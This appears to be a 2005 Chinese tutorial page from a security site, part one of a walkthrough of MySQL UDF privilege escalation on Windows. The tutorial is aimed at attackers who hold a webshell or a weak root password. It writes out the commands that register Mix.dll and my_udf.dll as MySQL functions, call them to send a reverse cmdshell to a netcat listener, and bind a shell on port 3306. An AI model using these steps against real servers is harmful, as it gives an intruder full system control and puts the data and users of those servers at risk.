文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术网络安全MySql本地提升演示
精品推荐
特别推荐
·无线入侵的技术细节
·SQL注入和CSS攻击的检测
·详解:五种Windows常用密码设置
·浅析黑客攻击时的常用方法和攻击步骤
·不怕攻击 家庭上网必学八招安全绝招
·入门者如何获取肉鸡
·Linux安全配置步骤简述
·Wi-Fi网络安全探讨及组网策略
·网页病毒的概念
·保障您网站安全的十点技巧
·技巧:网上交易密码保护的几种窍门
·六个简单方法防止上网被钓鱼
·PING命令的小秘密
·安全第一 网络端口扫描技术介绍
·十大网络工具帮你审核网络安全
·信息安全问题需解决方案
·多角度详细解释网站安全保护方法
·端口截听实现端口隐藏,嗅叹与攻击
·用Win NT/2K 建WEB站点安全指南
·实现 Web 应用程序安全的捷径
热点TOP10
·解析远程控制带来的安全危险
·不怕攻击 家庭上网必学八招安全绝招
·内网数据库服务器入侵实战
·MD5 Password Cracker 一个国外的md5爆破工具(速度极快)
·安全漏洞的起因:ActiveX技术安全报告
·黑客攻击步骤-如何获得IP
·认识映象劫持技术原理与解决办法
·保障您网站安全的十点技巧
·交换环境下SNIFFER的攻击技术手段
·防范于未然 2008五大企业安全问题预测
·假冒腾讯qq网络骗子欺诈骗术大曝光
·企业安全 减少内部安全风险的10种方法
·让尘封的DOS机莺歌燕舞欢喜过大年
·确保数据中心虚拟化安全10个步骤
·2007年12月十大网络安全漏洞综述
·大网站是保障网络安全的技巧
·检查并堵住网站的eWebEditor漏洞
·面临什么新威胁 PC安全终极指南
·深入理解防火墙 屏蔽外界攻击
·预防网络病毒的几个忠告

MySql本地提升演示

日期:2005年10月31日 作者: 查看:[大字体 中字体 小字体]


前段时间听说mysql利用Mix.dll可以直接拿到系统权限,我在本地测试了一下,效果不错,我是在windows server2003 sp1下测试的,测试MYSQL的版本是4.0.23,这个提升在什么情况能够利用呢?比如我们获得一个phpshell的情况下,没装serv-u,又没装pcanywhere,就装了一个mysql,所知的提升方法在这里也用不上,这时就可以用到这个方法了,在扫到MYSQL弱口令的情况下也能用上, 怎么把DLL文件传上去呢?请自行查看Mix的文章,我本地测试就不多此一举了,现在我们来看一下该怎么样弄的。我们先登陆MYSQL,开始-运行- CMD 跳到MYSQL的安装目录。输入mysql -uroot -p 用户名root 密码为空。好登陆成功,如图1
Click to Open in New Window

好现在我们输入create function Mixconnect returns string soname 'c:\\Mix\\Mix.dll'; 我们需要注册Mixconnect来执行系统命令。这里的c:\\mix\\mix.dll就是我本机的 Mix.dll的路径。输入后按回车,出现Qusery OK等字样,那就是注册成功了。如图2
Click to Open in New Window

好了显示注册成功,然后我们用NC监听1234端口,nc -l -p 1234 。如图3
Click to Open in New Window

快到关键的时刻咯,时时关注此NC窗口。现在我们在登陆MYSQL的那个CMD窗口输入select Mixconnect('127.0.0.1','1234');然后按回车,就定在那里了,而监听的那个窗口已经成功得到一个cmdshell了。如图4
Click to Open in New Window

成功得到cmdshell,但是MYSQL已经假死了,这时我们需要把mysql的服务进程给KILL掉,仅仅重新启动MYSQL是不行的, KILL掉之后再重新启动服务。不光Mix.dll可以拿下系统权限,my_udf.dll也可以,用法也一样,我们继续来看看.用法一样,只不过得到 cmdshell的方式不同.先登陆mysql,然后输入create function my_udfdoor returns string soname 'c:\\Mix\\my_udf.dll'; 按回车,如图5
Click to Open in New Window

注册函数成功,然后我们就开始激活这个函数,输入select my_udfdoor (''); 回车,然后用nc连接3306端口,然后输入fuck 就可以得到一个cmdshell啦,如图6 .7
Click to Open in New Window

[1] [2] 下一页 




上一篇:最全的网络硬盘(免费)

下一篇:利用VBS脚本让QQ永远在线

MySql本地提升演示 相关文章:
·Windows XP下PHP+MySQL环境搭建
·QQ密码本地破解的原理和方法
·双倍提升硬盘传输速度的技巧
·如何将文字、表格、演示稿转为PDF格式
·Apache+PHP+MySQL+Wordpress 本地架设笔记
·PHP5对Mysql5的任意数据库表的管理代码示例(三)
·利用Serv-U缺陷提升Webshell权限
·三菱显示器演示卡通专辑
·删除Vista无用协议 提升上网速度
·JS分层的概念与本地存贮
MySql本地提升演示 相关软件:
·SQL/MYSQL/数据库教程专栏
·[战地2] 中美激战演示
·MySQL-to-Access V1.3
·id Tech 5引擎演示
·《传奇单机演示版》试玩
·《地球帝国3》演示视频
·《咕噜小天使》演示DEMO版
·《无冬之夜2》星空官方本地化补丁
·《战争猎犬》技术演示动画一
·NDS《女力紧急提升!DS》模拟器

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.net
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved. 鄂ICP备05000083号Powered by:viphot